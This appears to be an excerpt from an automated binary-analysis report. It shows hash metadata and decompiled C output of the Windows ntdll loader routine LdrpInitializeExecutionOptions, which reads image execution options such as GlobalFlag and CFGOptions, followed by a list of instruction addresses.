API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09d34467e25019b53f4b3c86f11e95f88a32e88ddeee721e160686e54e4f987e
Instruction ID: 96374c57b9bd8893ee54b8993b31e5c53f7b2adb0440d7fd54ff2be4132410fe
Opcode Fuzzy Hash: 09d34467e25019b53f4b3c86f11e95f88a32e88ddeee721e160686e54e4f987e
Instruction Fuzzy Hash: 66B09272D064C6CAEB11EB604B08B1B7A806BD0741F66C466E2460A81E8738D292F276

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1F041FC9 Relevance: 26.1, Strings: 20, Instructions: 1117
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1F041FC9(signed int __ecx, signed int __edx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, char _a23, signed int _a24, signed int _a28, signed int _a32, char _a36, signed int _a40, signed int _a44, void* _a48, signed int _a56, signed int _a60, signed int _a64, char _a68, char _a72, short _a74, intOrPtr _a76, char _a80, short _a82, intOrPtr _a84, char _a88, short _a90, intOrPtr _a92, char _a96, short _a98, intOrPtr _a100, char _a104, short _a106, intOrPtr _a108, void* _a112, signed int* _a116, signed int* _a120, char _a124, short _a126, char* _a128, intOrPtr _a132, signed int _a136, signed int _a140, char _a144, signed int _a148, intOrPtr _a152, intOrPtr _a156, signed int _a160, signed int _a164, char _a168, char _a176, char _a1200, char _a2224, char _a3248, char _a4272, char _a5296, char _a5328, signed int _a5724) {
				void* _v0;
				signed int _v4;
				signed int _v12;
				signed int _v16;
				intOrPtr _v24;
				signed int _v72;
				intOrPtr _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t392;
				signed int _t399;
				signed char _t407;
				signed int _t409;
				short _t412;
				signed int _t420;
				signed int _t422;
				void* _t427;
				intOrPtr _t435;
				intOrPtr _t452;
				signed int _t454;
				signed int _t457;
				signed int _t463;
				signed int _t465;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t475;
				intOrPtr _t477;
				signed int _t482;
				intOrPtr _t483;
				signed int _t484;
				void* _t504;
				intOrPtr _t506;
				signed int _t511;
				intOrPtr _t512;
				intOrPtr _t538;
				signed int _t540;
				intOrPtr _t543;
				void* _t569;
				intOrPtr _t571;
				signed int _t573;
				intOrPtr _t576;
				intOrPtr _t602;
				signed int _t604;
				intOrPtr _t607;
				void* _t634;
				signed int* _t638;
				signed int* _t639;
				void* _t640;
				signed int _t641;
				char _t642;
				signed int* _t644;
				intOrPtr _t657;
				signed int _t663;
				signed int _t667;
				void* _t668;
				intOrPtr _t669;
				signed int _t670;
				void* _t676;
				signed int _t690;
				signed int _t691;
				void* _t692;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t699;
				void* _t701;
				signed int _t703;
				void* _t707;
				signed int _t708;
				signed int _t709;
				signed int _t710;
				signed int _t711;
				signed int _t712;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t717;
				signed int _t718;
				signed int _t719;

				_t719 = _t718 & 0xfffffff8;
				E1F0064E0(0x1664);
				_a5724 =  *0x1f0bb370 ^ _t719;
				_a8 = __edx;
				_a60 = __ecx;
				_t644 = _a8;
				_a132 = _a4;
				_t392 = _a12;
				_a140 = _a16;
				 *_t644 = 0;
				_t637 = 0;
				_a120 = _t392;
				_t699 = 0;
				 *_t392 = 0;
				_t690 = 0;
				_a116 = _t644;
				_a68 = 0;
				_v4 = 0;
				_a44 = 0;
				_a64 = 0;
				_a56 = 0;
				_a23 = 1;
				_a16 = 0;
				_a112 = 0;
				E1F041F45();
				if(( *( *((intOrPtr*)(_a8 + 0x10)) + 8) & 0x00004000) != 0) {
					L189:
					__eflags = E1EFE0130();
					if(__eflags != 0) {
						_t699 = _t699 | 0x00000001;
						__eflags = _t699;
					}
					_t646 = _t699;
					_t675 =  *( *((intOrPtr*)(_a8 + 0x10)) + 8);
					E1F06722B( *( *((intOrPtr*)(_a8 + 0x10)) + 8), __eflags);
					__eflags = _a23;
					if(_a23 != 0) {
						__eflags =  *0x1f0b5d70;
						if( *0x1f0b5d70 == 0) {
							__eflags =  *0x7ffe03a0 & 0x00000001;
							if(( *0x7ffe03a0 & 0x00000001) != 0) {
								_t646 = _a60;
								_t420 = E1F048A07(_t637, _a60,  &_a44);
								__eflags = _t420;
								if(_t420 < 0) {
									_t347 =  &_a44;
									 *_t347 = _a44 & 0x00000000;
									__eflags =  *_t347;
								} else {
									_t422 = L1EFB6CC0(_a44, L"GlobalFlag", 4,  &_a40, 4, 0);
									__eflags = _t422;
									if(_t422 >= 0) {
										 *(_a8 + 0x68) =  *(_a8 + 0x68) | _a40 & 0x02000100;
										_a16 = _a44;
									}
								}
							}
						}
					}
					_t399 = _a8;
					_t700 = 0;
					__eflags =  *(_t399 + 0x68) & 0x02000100;
					if(( *(_t399 + 0x68) & 0x02000100) != 0) {
						L212:
						_t691 = _a8;
						_t675 = _t691;
						_t700 = E1F041DD8(_a60, _t691, _a68, _a16, _a132, _a140);
						__eflags = _t700;
						if(_t700 >= 0) {
							goto L206;
						}
						_t407 =  *0x1f0b37c0; // 0x0
						__eflags = _t407 & 0x00000003;
						if((_t407 & 0x00000003) != 0) {
							E1F03E692("minkernel\\ntdll\\ldrinit.c", 0x2005, "LdrpInitializeExecutionOptions", 0, "Initializing the application verifier package failed with status 0x%08lx\n", _t700);
							_t407 =  *0x1f0b37c0; // 0x0
							_t719 = _t719 + 0x18;
						}
						__eflags = _t407 & 0x00000010;
						if((_t407 & 0x00000010) != 0) {
							asm("int3");
						}
						goto L208;
					} else {
						_t409 = E1F0436EC();
						__eflags = _t409;
						if(_t409 != 0) {
							goto L212;
						}
						__eflags = _t690;
						_t691 = _a8;
						if(_t690 != 0) {
							L206:
							__eflags =  *(_t691 + 0x478) & 0x00000001;
							if(( *(_t691 + 0x478) & 0x00000001) != 0) {
								_t368 = _t691 + 0x474;
								 *_t368 =  *(_t691 + 0x474) | 0x00000001;
								__eflags =  *_t368;
							}
							L208:
							__eflags = _t700;
							if(_t700 < 0) {
								L217:
								_t638 = _a116;
								__eflags =  *_t638;
								if( *_t638 != 0) {
									_push( *_t638);
									E1F002A80();
									 *_t638 =  *_t638 & 0x00000000;
									__eflags =  *_t638;
								}
								_t639 = _a120;
								__eflags =  *_t639;
								if( *_t639 != 0) {
									_push( *_t639);
									E1F002A80();
									 *_t639 =  *_t639 & 0x00000000;
									__eflags =  *_t639;
								}
								L221:
								__eflags = _a44;
								if(_a44 != 0) {
									_push(_a44);
									E1F002A80();
								}
								_pop(_t692);
								_pop(_t701);
								_pop(_t640);
								__eflags = _a5724 ^ _t719;
								return E1F004B50(_t700, _t640, _a5724 ^ _t719, _t675, _t692, _t701);
							}
							E1F04395B(_t637);
							goto L221;
						}
						__eflags = _t637;
						if(_t637 != 0) {
							goto L206;
						}
						__eflags =  *((intOrPtr*)(_t691 + 2)) - _t637;
						if( *((intOrPtr*)(_t691 + 2)) == _t637) {
							goto L206;
						}
						_a128 =  &_a5296;
						_a124 = 0;
						_t412 = 0x20;
						_a126 = _t412;
						__eflags = E1EFEB130(_t646,  *((intOrPtr*)( *((intOrPtr*)(_t691 + 0x10)) + 0x48)), 0x1ef91a40,  &_a124);
						if(__eflags < 0) {
							_t700 = 0;
							__eflags = 0;
							L211:
							 *(_t691 + 0x68) =  *(_t691 + 0x68) | 0x00000070;
							goto L206;
						}
						_push( &_v0);
						_push(_t637);
						_push( &_a124);
						_t700 = E1EFF07D0(_t637, _t691, 0, __eflags);
						__eflags = _t700;
						if(_t700 < 0) {
							goto L211;
						}
						__eflags = _v12 - _t637;
						if(_v12 == _t637) {
							goto L211;
						}
						goto L206;
					}
				}
				_t651 = _a60;
				_push( &_v4);
				_push(0);
				_t676 = 9;
				_t427 = E1EFF5E29(_a60, _t676);
				_t637 = _v12;
				if(_t427 < 0) {
					goto L189;
				} else {
					_t703 = _a8;
					 *_a116 = _t637;
					if(( *(_t703 + 3) & 0x00000010) != 0) {
						_t651 =  &_a5328;
						if(E1F041A93( &_a5328, _t676) >= 0) {
							E1F005050( &_a5328,  &_a168,  &_a5328);
							_t651 =  &_a160;
							_t634 = E1F04FEBB( &_a160, _t637,  &_a48);
							_t690 = _a44;
							if(_t634 >= 0) {
								 *_a120 = _t690;
							}
						}
					}
					E1EFB6C5D(_t690, _t637, L"DisableHeapLookaside", 4, 0x1f0b6934, 4, _t651, 0);
					E1EFB6C5D(_t690, _t637, L"FrontEndHeapDebugOptions", 4,  &_a40, 4, _t690, 0);
					E1EFB6C5D(_t690, _t637, L"ShutdownFlags", 4, 0x1f0b6944, 4, _t690, 0);
					_v72 = _v72 & 0x00000000;
					_t655 = _t690;
					E1EFB6C5D(_t690, _t637, L"UnloadEventTraceDepth", 4,  &_v72, 4, _t690, 0);
					_t435 = _v96;
					if(_t435 != 0) {
						 *0x1f0b3918 = _t435;
					}
					_v0 = _v0 & 0x00000000;
					E1EFB6C5D(_t690, _t637, L"MaxLoaderThreads", 4,  &_v0, 4, _t655, 0);
					_t657 = _v24;
					if(_t657 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t703 + 0x10)) + 0x2a0)) = _t657;
					}
					_v0 = _v0 & 0x00000000;
					_t658 = _t690;
					E1EFB6C5D(_t690, _t637, L"UseImpersonatedDeviceMap", 4,  &_v0, 4, _t657, 0);
					if(_v24 != 0) {
						 *0x1f0b5d58 = 1;
					}
					_v0 = _v0 & 0x00000000;
					E1EFB6C5D(_t690, _t637, L"TracingFlags", 4,  &_v0, 4, _t658, 0);
					_t660 = _v24;
					if(_v24 != 0) {
						asm("lock or [eax], ecx");
					}
					_v0 = _v0 & 0x00000000;
					_t675 = _t637;
					_t661 = _t690;
					if(E1EFB6C5D(_t690, _t637, L"RaiseExceptionOnPossibleDeadlock", 4,  &_v0, 4, _t660, 0) >= 0) {
						 *0x1f0b4ae1 = _v0 != 0;
					}
					_a48 = _a48 & 0x00000000;
					if(E1EFE1D10( &_a72, L"ExecuteOptions") < 0) {
						L45:
						if(E1EFE1D10( &_a80, L"DisableExceptionChainValidation") < 0) {
							L81:
							if(_a48 != 0) {
								_push(4);
								_push( &_a48);
								_push(0x22);
								_push(0xffffffff);
								E1F002B70();
							}
							L83:
							_v0 = _v0 & 0x00000000;
							if(E1EFE1D10( &_a88, L"CFGOptions") < 0) {
								L114:
								if(( *(_a8 + 3) & 0x00000001) == 0) {
									L119:
									if(E1EFE1D10( &_a96, L"MinimumStackCommitInBytes") < 0) {
										L143:
										_t663 = _a8;
										_t452 = _v0;
										if( *((intOrPtr*)(_t663 + 0x208)) < _t452) {
											 *((intOrPtr*)(_t663 + 0x208)) = _t452;
										}
										_t707 = 0;
										while(1) {
											_v0 = _v0 & 0x00000000;
											_t250 = _t707 + 0x1ef91a60; // 0x0
											_t454 = L1EFB6CC0(_t637,  *_t250, 4,  &_v0, 4, 0);
											_t252 = _t707 + 0x1ef91a64; // 0x0
											_t664 =  *_t252;
											_t707 = _t707 + 8;
											 *( *_t252) = _t454 & 0xffffff00 | _v24 != 0x00000000;
											if(_t707 == 0x18) {
												break;
											}
											_t637 = _v4;
										}
										_v0 = _v0 & 0x00000000;
										_t457 = E1EFE1D10( &_a104, L"MaxDeadActivationContexts");
										__eflags = _t457;
										if(_t457 < 0) {
											L173:
											_t637 = _v4;
											L174:
											_t708 = _a8;
											_t690 = _a56;
											_a12 =  *(_t708 + 0x68) >> 0x00000008 & 0xffffff01;
											_t665 = _t690;
											_t463 = E1EFB6C5D(_t690, _t637, L"GlobalFlag", 4,  &_a40, 4, _t664,  &_a112);
											__eflags = _t463;
											if(_t463 < 0) {
												L184:
												_t465 = E1EFB6C5D(_t690, _t637, L"GlobalFlag2", 4,  &_a40, 4, _t665, 0);
												__eflags = _t465;
												if(_t465 >= 0) {
													 *((intOrPtr*)(_t708 + 0x478)) = _a40;
												}
												__eflags =  *(_t708 + 0x68) & 0x02000100;
												_t699 = _a64;
												_a68 = _a12;
												if(( *(_t708 + 0x68) & 0x02000100) == 0) {
													_t329 =  &_a16;
													 *_t329 = _a16 & 0x00000000;
													__eflags =  *_t329;
												} else {
													_a23 = 0;
													_a16 = _a112;
												}
												goto L189;
											}
											_t709 = _a40;
											__eflags = _t709 & 0x02000100;
											if((_t709 & 0x02000100) == 0) {
												L182:
												_t469 = _a8;
												 *(_t469 + 0x68) = _t709;
												_t708 = _t469;
												goto L184;
											}
											_t665 = _a8;
											_t470 = E1F043152(_a8, _t690, _t637);
											__eflags = _t470;
											if(_t470 == 0) {
												_t709 = _t709 & 0xfdfffeff;
												__eflags = _t709;
												_a40 = _t709;
											}
											__eflags = _t709 & 0x02000100;
											if((_t709 & 0x02000100) != 0) {
												_t665 = _a60;
												_t471 = E1F043881(_a60,  &_a136);
												__eflags = _t471;
												if(_t471 < 0) {
													_t708 = _a8;
													goto L184;
												}
												__eflags = _a136;
												if(_a136 == 0) {
													_t709 = _t709 & 0xfdfffeff;
													__eflags = _t709;
													_a40 = _t709;
												}
											}
											goto L182;
										}
										_t637 = _v4;
										_push( &_a16);
										_push(0x400);
										_t710 =  &_a4272;
										_push(_t710);
										_push(2);
										_push( &_a104);
										_push(_t637);
										_t475 = E1F002B00();
										__eflags = _t475;
										if(_t475 < 0) {
											__eflags = _t475 - 0x80000005;
											if(_t475 != 0x80000005) {
												goto L174;
											} else {
												goto L157;
											}
											while(1) {
												L157:
												_t641 = _a16;
												_t664 =  *( *[fs:0x30] + 0x18);
												__eflags = _t664;
												if(_t664 == 0) {
													goto L173;
												}
												_t477 =  *0x1f0b5d78; // 0x0
												_t693 = E1EFD5D90(_t664, _t664, _t477 + 0x180000, _a16);
												__eflags = _t693;
												if(_t693 == 0) {
													goto L173;
												}
												_t710 = _t693;
												_push( &_a16);
												_push(_t641);
												_t637 = _v4;
												_push(_t693);
												_push(2);
												_push( &_a104);
												_push(_t637);
												_t482 = E1F002B00();
												__eflags = _t482;
												if(_t482 >= 0) {
													L151:
													_t483 =  *((intOrPtr*)(_t710 + 4));
													__eflags = _t483 - 3;
													if(_t483 == 3) {
														L166:
														_t664 = 4;
														__eflags = _t483 - _t664;
														if(_t483 == _t664) {
															_a16 =  *((intOrPtr*)(_t710 + 8));
															__eflags =  *((intOrPtr*)(_t710 + 8)) - _t664;
															if( *((intOrPtr*)(_t710 + 8)) <= _t664) {
																_t291 = _t710 + 0xc; // 0xc
																E1F0088C0( &_v0, _t291,  *((intOrPtr*)(_t710 + 8)));
																_t719 = _t719 + 0xc;
															}
														}
														L169:
														__eflags = _t693;
														if(_t693 != 0) {
															E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t693);
															_t637 = _v16;
														}
														_t484 = _v0;
														__eflags = _t484;
														if(_t484 != 0) {
															 *0x1f0b3940 = _t484;
														}
														goto L174;
													}
													__eflags = _t483 - 7;
													if(_t483 == 7) {
														goto L166;
													}
													_t664 = 4;
													__eflags = _t483 - _t664;
													if(_t483 != _t664) {
														__eflags = _t483 - 0xb;
														if(_t483 != 0xb) {
															__eflags = _t483 - 1;
															if(_t483 == 1) {
																__eflags =  &_v0 & 0x00000003;
																if(__eflags == 0) {
																	_t278 = _t710 + 0xc; // 0xc
																	_a16 = _t664;
																	_a108 = _t278;
																	_a104 =  *((intOrPtr*)(_t710 + 8));
																	_a106 =  *((intOrPtr*)(_t710 + 8));
																	_push( &_v0);
																	_push(0);
																	_push( &_a104);
																	E1EFF07D0(_t637, _t693, _t710, __eflags);
																}
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t710 + 8)) - _t664;
														if( *((intOrPtr*)(_t710 + 8)) == _t664) {
															_a16 = _t664;
															_v0 =  *((intOrPtr*)(_t710 + 0xc));
														}
													}
													goto L169;
												}
												__eflags = _t482 - 0x80000005;
												if(_t482 != 0x80000005) {
													goto L169;
												}
												E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t693);
											}
											goto L173;
										}
										_t693 = 0;
										__eflags = 0;
										goto L151;
									}
									_push( &_a36);
									_push(0x400);
									_t711 =  &_a3248;
									_push(_t711);
									_push(2);
									_push( &_a96);
									_push(_t637);
									_t504 = E1F002B00();
									if(_t504 < 0) {
										__eflags = _t504 - 0x80000005;
										if(_t504 != 0x80000005) {
											goto L143;
										} else {
											goto L128;
										}
										while(1) {
											L128:
											_t642 = _a36;
											_t667 =  *( *[fs:0x30] + 0x18);
											__eflags = _t667;
											if(_t667 == 0) {
												break;
											}
											_t506 =  *0x1f0b5d78; // 0x0
											_t694 = E1EFD5D90(_t667, _t667, _t506 + 0x180000, _a36);
											__eflags = _t694;
											if(_t694 == 0) {
												break;
											}
											_t711 = _t694;
											_push( &_a36);
											_push(_t642);
											_t637 = _v4;
											_push(_t694);
											_push(2);
											_push( &_a96);
											_push(_v4);
											_t511 = E1F002B00();
											__eflags = _t511;
											if(_t511 >= 0) {
												L122:
												_t512 =  *((intOrPtr*)(_t711 + 4));
												if(_t512 == 3 || _t512 == 7) {
													_t668 = 4;
													__eflags = _t512 - _t668;
													if(_t512 == _t668) {
														_a36 =  *((intOrPtr*)(_t711 + 8));
														__eflags =  *((intOrPtr*)(_t711 + 8)) - _t668;
														if( *((intOrPtr*)(_t711 + 8)) <= _t668) {
															_t239 = _t711 + 0xc; // 0xc
															E1F0088C0( &_v0, _t239,  *((intOrPtr*)(_t711 + 8)));
															_t719 = _t719 + 0xc;
														}
													}
												} else {
													_t669 = 4;
													if(_t512 != _t669) {
														__eflags = _t512 - 0xb;
														if(_t512 != 0xb) {
															__eflags = _t512 - 1;
															if(_t512 == 1) {
																__eflags =  &_v0 & 0x00000003;
																if(__eflags == 0) {
																	_t226 = _t711 + 0xc; // 0xc
																	_a36 = _t669;
																	_a100 = _t226;
																	_a96 =  *((intOrPtr*)(_t711 + 8));
																	_a98 =  *((intOrPtr*)(_t711 + 8));
																	_push( &_v0);
																	_push(0);
																	_push( &_a96);
																	E1EFF07D0(_t637, _t694, _t711, __eflags);
																}
															}
														}
													} else {
														if( *((intOrPtr*)(_t711 + 8)) == _t669) {
															_a36 = _t669;
															_v0 =  *((intOrPtr*)(_t711 + 0xc));
														}
													}
												}
												L140:
												if(_t694 == 0) {
													goto L143;
												}
												E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t694);
												break;
											}
											__eflags = _t511 - 0x80000005;
											if(_t511 != 0x80000005) {
												goto L140;
											}
											E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t694);
										}
										_t637 = _v4;
										goto L143;
									}
									_t694 = 0;
									goto L122;
								}
								_a160 = _a160 & 0x00000000;
								_a164 = _a164 & 0x00000000;
								_push( &_a144);
								_push(1);
								_push(0x1f0b5a98);
								_a144 = 0x18;
								_a148 = _t637;
								_a156 = 0x40;
								_a152 = 0x1ef91a38;
								_t700 = E1F002AB0();
								if(_t700 != 0xc0000034) {
									__eflags = _t700;
									if(_t700 < 0) {
										goto L217;
									}
									goto L119;
								}
								 *0x1f0b5a98 =  *0x1f0b5a98 & 0x00000000;
								goto L119;
							}
							_push( &_a32);
							_push(0x400);
							_t695 =  &_a2224;
							_push(_t695);
							_push(2);
							_push( &_a88);
							_push(_t637);
							_t712 = E1F002B00();
							if(_t712 < 0) {
								__eflags = _t712 - 0x80000005;
								if(_t712 != 0x80000005) {
									goto L111;
								} else {
									goto L93;
								}
								while(1) {
									L93:
									_t713 = _a32;
									_t670 =  *( *[fs:0x30] + 0x18);
									__eflags = _t670;
									if(_t670 == 0) {
										break;
									}
									_t538 =  *0x1f0b5d78; // 0x0
									_t540 = E1EFD5D90(_t670, _t670, _t538 + 0x180000, _a32);
									_v0 = _t540;
									__eflags = _t540;
									if(_t540 == 0) {
										break;
									}
									_t637 = _v4;
									_t661 =  &_a32;
									_push( &_a32);
									_push(_t713);
									_push(_t540);
									_t695 = _t540;
									_push(2);
									_push( &_a88);
									_push(_t637);
									_t712 = E1F002B00();
									__eflags = _t712;
									if(_t712 >= 0) {
										goto L86;
									}
									__eflags = _t712 - 0x80000005;
									if(_t712 != 0x80000005) {
										goto L109;
									} else {
										E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t695);
										continue;
									}
								}
								_t637 = _v4;
								goto L114;
							} else {
								_a12 = 0;
								L86:
								_t543 =  *((intOrPtr*)(_t695 + 4));
								if(_t543 == 3 || _t543 == 7) {
									_t661 = 4;
									__eflags = _t543 - _t661;
									if(_t543 != _t661) {
										goto L101;
									}
									_a32 =  *((intOrPtr*)(_t695 + 8));
									__eflags =  *((intOrPtr*)(_t695 + 8)) - _t661;
									if( *((intOrPtr*)(_t695 + 8)) > _t661) {
										_t712 = 0x80000005;
									} else {
										_t185 = _t695 + 0xc; // 0xc
										E1F0088C0( &_v0, _t185,  *((intOrPtr*)(_t695 + 8)));
										_t719 = _t719 + 0xc;
									}
									goto L109;
								} else {
									_t661 = 4;
									if(_t543 != _t661) {
										__eflags = _t543 - 0xb;
										if(_t543 == 0xb) {
											L101:
											_t712 = 0xc0000024;
											goto L109;
										}
										__eflags = _t543 - 1;
										if(_t543 == 1) {
											__eflags =  &_v0 & 0x00000003;
											if(__eflags == 0) {
												_t172 = _t695 + 0xc; // 0xc
												_a32 = _t661;
												_a92 = _t172;
												_a88 =  *((intOrPtr*)(_t695 + 8));
												_a90 =  *((intOrPtr*)(_t695 + 8));
												_push( &_v0);
												_push(0);
												_push( &_a88);
												_t712 = E1EFF07D0(_t637, _t695, _t712, __eflags);
											} else {
												_t712 = 0x80000002;
											}
											goto L109;
										}
										goto L101;
									} else {
										if( *((intOrPtr*)(_t695 + 8)) != _t661) {
											_t712 = 0xc0000004;
										} else {
											_a32 = _t661;
											_v0 =  *((intOrPtr*)(_t695 + 0xc));
										}
										L109:
										_t544 = _a12;
										if(_a12 != 0) {
											E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t544);
											_t637 = _v16;
										}
										L111:
										if(_t712 >= 0 && (_v0 & 0x00000001) != 0) {
											E1EFF1D66(_t661, _t675, 0);
											 *0x1f0b9232 = 1;
											E1EFF1D66(_t661, _t675, 1);
										}
										goto L114;
									}
								}
							}
						}
						_push( &_a28);
						_push(0x400);
						_t696 =  &_a1200;
						_push(_t696);
						_push(2);
						_push( &_a80);
						_push(_t637);
						_t714 = E1F002B00();
						if(_t714 < 0) {
							__eflags = _t714 - 0x80000005;
							if(_t714 != 0x80000005) {
								goto L73;
							} else {
								goto L55;
							}
							while(1) {
								L55:
								_t715 = _a28;
								_t661 =  *( *[fs:0x30] + 0x18);
								__eflags = _t661;
								if(_t661 == 0) {
									break;
								}
								_t571 =  *0x1f0b5d78; // 0x0
								_t573 = E1EFD5D90(_t661, _t661, _t571 + 0x180000, _a28);
								_v0 = _t573;
								__eflags = _t573;
								if(_t573 == 0) {
									break;
								}
								_t637 = _v4;
								_t661 =  &_a28;
								_push( &_a28);
								_push(_t715);
								_push(_t573);
								_t696 = _t573;
								_push(2);
								_push( &_a80);
								_push(_t637);
								_t714 = E1F002B00();
								__eflags = _t714;
								if(_t714 >= 0) {
									goto L48;
								}
								__eflags = _t714 - 0x80000005;
								if(_t714 != 0x80000005) {
									goto L71;
								} else {
									E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t696);
									continue;
								}
							}
							_t637 = _v4;
							goto L81;
						} else {
							_a12 = 0;
							L48:
							_t576 =  *((intOrPtr*)(_t696 + 4));
							if(_t576 == 3 || _t576 == 7) {
								_t661 = 4;
								__eflags = _t576 - _t661;
								if(_t576 != _t661) {
									goto L63;
								} else {
									_a28 =  *((intOrPtr*)(_t696 + 8));
									__eflags =  *((intOrPtr*)(_t696 + 8)) - _t661;
									if( *((intOrPtr*)(_t696 + 8)) > _t661) {
										_t714 = 0x80000005;
									} else {
										_t139 = _t696 + 0xc; // 0xc
										E1F0088C0(0x1f0b38bc, _t139,  *((intOrPtr*)(_t696 + 8)));
										_t719 = _t719 + 0xc;
									}
									goto L71;
								}
							} else {
								_t661 = 4;
								if(_t576 != _t661) {
									__eflags = _t576 - 0xb;
									if(_t576 == 0xb) {
										L63:
										_t714 = 0xc0000024;
										goto L71;
									}
									__eflags = _t576 - 1;
									if(_t576 == 1) {
										_t675 = 0x1f0b38bc;
										__eflags = 0;
										if(0 == 0) {
											_t127 = _t696 + 0xc; // 0xc
											_a28 = _t661;
											_a84 = _t127;
											_a80 =  *((intOrPtr*)(_t696 + 8));
											_push(0x1f0b38bc);
											_a82 =  *((intOrPtr*)(_t696 + 8));
											_push(0);
											_push( &_a80);
											_t714 = E1EFF07D0(_t637, _t696, _t714, 0);
										} else {
											_t714 = 0x80000002;
										}
										goto L71;
									}
									goto L63;
								} else {
									if( *((intOrPtr*)(_t696 + 8)) != _t661) {
										_t714 = 0xc0000004;
									} else {
										_a28 = _t661;
										 *0x1f0b38bc =  *((intOrPtr*)(_t696 + 0xc));
									}
									L71:
									_t577 = _a12;
									if(_a12 != 0) {
										E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t577);
										_t637 = _v16;
									}
									L73:
									if(_t714 < 0) {
										goto L81;
									} else {
										_t569 =  *0x1f0b38bc; // 0x0
										if(_t569 != 0 && _t569 != 3 && _t569 != 2) {
											 *0x1f0b38bc = 1;
										}
										if(_a48 == 0) {
											goto L83;
										} else {
											if( *0x1f0b38bc == 1) {
												_a48 = _a48 | 0x00000040;
											}
											goto L81;
										}
									}
								}
							}
						}
					}
					_push( &_a24);
					_push(0x400);
					_t697 =  &_a176;
					_push(_t697);
					_push(2);
					_push( &_a72);
					_push(_t637);
					_t716 = E1F002B00();
					if(_t716 < 0) {
						__eflags = _t716 - 0x80000005;
						if(_t716 != 0x80000005) {
							goto L43;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_t717 = _a24;
							_t661 =  *( *[fs:0x30] + 0x18);
							__eflags = _t661;
							if(_t661 == 0) {
								break;
							}
							_t602 =  *0x1f0b5d78; // 0x0
							_t604 = E1EFD5D90(_t661, _t661, _t602 + 0x180000, _a24);
							_v0 = _t604;
							__eflags = _t604;
							if(_t604 == 0) {
								break;
							}
							_t637 = _v4;
							_t661 =  &_a24;
							_push( &_a24);
							_push(_t717);
							_push(_t604);
							_t697 = _t604;
							_push(2);
							_push( &_a72);
							_push(_t637);
							_t716 = E1F002B00();
							__eflags = _t716;
							if(_t716 >= 0) {
								goto L19;
							}
							__eflags = _t716 - 0x80000005;
							if(_t716 != 0x80000005) {
								goto L41;
							} else {
								E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t697);
								continue;
							}
						}
						_t637 = _v4;
						goto L45;
					} else {
						_a12 = 0;
						L19:
						_t607 =  *((intOrPtr*)(_t697 + 4));
						if(_t607 == 3 || _t607 == 7) {
							_t661 = 4;
							__eflags = _t607 - _t661;
							if(_t607 != _t661) {
								goto L33;
							} else {
								_a24 =  *((intOrPtr*)(_t697 + 8));
								__eflags =  *((intOrPtr*)(_t697 + 8)) - _t661;
								if( *((intOrPtr*)(_t697 + 8)) > _t661) {
									_t716 = 0x80000005;
								} else {
									_t100 = _t697 + 0xc; // 0xc
									E1F0088C0( &_a48, _t100,  *((intOrPtr*)(_t697 + 8)));
									_t719 = _t719 + 0xc;
								}
								goto L41;
							}
						} else {
							_t661 = 4;
							if(_t607 != _t661) {
								__eflags = _t607 - 0xb;
								if(_t607 == 0xb) {
									L33:
									_t716 = 0xc0000024;
									goto L41;
								}
								__eflags = _t607 - 1;
								if(_t607 == 1) {
									__eflags =  &_a48 & 0x00000003;
									if(__eflags == 0) {
										_t87 = _t697 + 0xc; // 0xc
										_a24 = _t661;
										_a76 = _t87;
										_a72 =  *((intOrPtr*)(_t697 + 8));
										_a74 =  *((intOrPtr*)(_t697 + 8));
										_push( &_a48);
										_push(0);
										_push( &_a72);
										_t716 = E1EFF07D0(_t637, _t697, _t716, __eflags);
									} else {
										_t716 = 0x80000002;
									}
									goto L41;
								}
								goto L33;
							} else {
								if( *((intOrPtr*)(_t697 + 8)) != _t661) {
									_t716 = 0xc0000004;
								} else {
									_a24 = _t661;
									_a48 =  *((intOrPtr*)(_t697 + 0xc));
								}
								L41:
								_t608 = _a12;
								if(_a12 != 0) {
									E1EFD3BC0( *( *[fs:0x30] + 0x18), 0, _t608);
									_t637 = _v16;
								}
								L43:
								if(_t716 >= 0) {
									asm("sbb eax, eax");
									_a48 = ( ~_a48 & 0xfffffff5) + 0xd;
								}
								goto L45;
							}
						}
					}
				}
			}

0x1f041fce
0x1f041fd6
0x1f041fe2
0x1f041fec
0x1f041ff3
0x1f041ff7
0x1f041ffa
0x1f042001
0x1f042005
0x1f04200f
0x1f042011
0x1f042014
0x1f04201b
0x1f04201d
0x1f04201f
0x1f042023
0x1f04202a
0x1f04202e
0x1f042032
0x1f042036
0x1f04203a
0x1f04203e
0x1f042043
0x1f042047
0x1f04204e
0x1f042061
0x1f042c86
0x1f042c8b
0x1f042c8d
0x1f042c8f
0x1f042c8f
0x1f042c8f
0x1f042c96
0x1f042c9b
0x1f042c9e
0x1f042ca3
0x1f042ca8
0x1f042caa
0x1f042cb1
0x1f042cb3
0x1f042cba
0x1f042cbc
0x1f042cc5
0x1f042cca
0x1f042ccc
0x1f042d05
0x1f042d05
0x1f042d05
0x1f042cce
0x1f042ce2
0x1f042ce7
0x1f042ce9
0x1f042cf8
0x1f042cff
0x1f042cff
0x1f042ce9
0x1f042ccc
0x1f042cba
0x1f042cb1
0x1f042d0a
0x1f042d0e
0x1f042d10
0x1f042d17
0x1f042dc1
0x1f042dc8
0x1f042dcc
0x1f042de6
0x1f042de8
0x1f042dea
0x00000000
0x00000000
0x1f042dec
0x1f042df1
0x1f042df3
0x1f042e0c
0x1f042e11
0x1f042e16
